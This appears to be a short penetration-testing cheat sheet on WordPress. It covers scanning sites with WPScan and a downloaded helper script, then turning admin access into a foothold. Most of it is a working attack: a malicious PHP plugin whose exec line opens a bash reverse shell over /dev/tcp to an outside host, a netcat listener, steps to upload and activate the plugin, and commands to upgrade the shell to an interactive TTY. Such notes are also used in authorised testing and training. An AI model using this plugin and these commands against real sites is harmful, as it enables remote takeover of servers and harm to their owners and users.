Find Wordpress Applications and Run WPScan

wget https://raw.githubusercontent.com/Bhanunamikaze/PenTest-Scripts/main/Wordpress_Scanner.sh
Wordpress_Scanner.sh domains.txt

Note: you need to update WPS API Key in the script

Scan Wordpress for Vulnerabilities 

- Login/Register to WPSScan website and Generate an API Key

wpscan --url <URL> --api-token <your WP Token Here> -o output.txt

Wordpress Reverse Shell

#Create a new plugin as below - save it as somename.php
<?php

   /**
    * Plugin Name: New Shell Plugin
    * Plugin URI:
    * Description: Reverse Shell Plugin
    * Version: 0.1
    * Author: Testing dude.. hope it works
    * Author URI: http://www.domain.com
    */
 exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.10.10/8080 0>&1'"); 
 
 ?>

#zip the file to somename.zip

#Start a listener
nc -nvlp 8080

# login to wordpress --> plugins --> add new plugin --> upload the zip
# Activate the plugin, you should get a shell on your listener 

#Get an Interactive Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl +Z 
stty raw -echo
fg
export TERM=xterm 
export PS1="\e[0;32m[\u - \W]\$ \e[0m"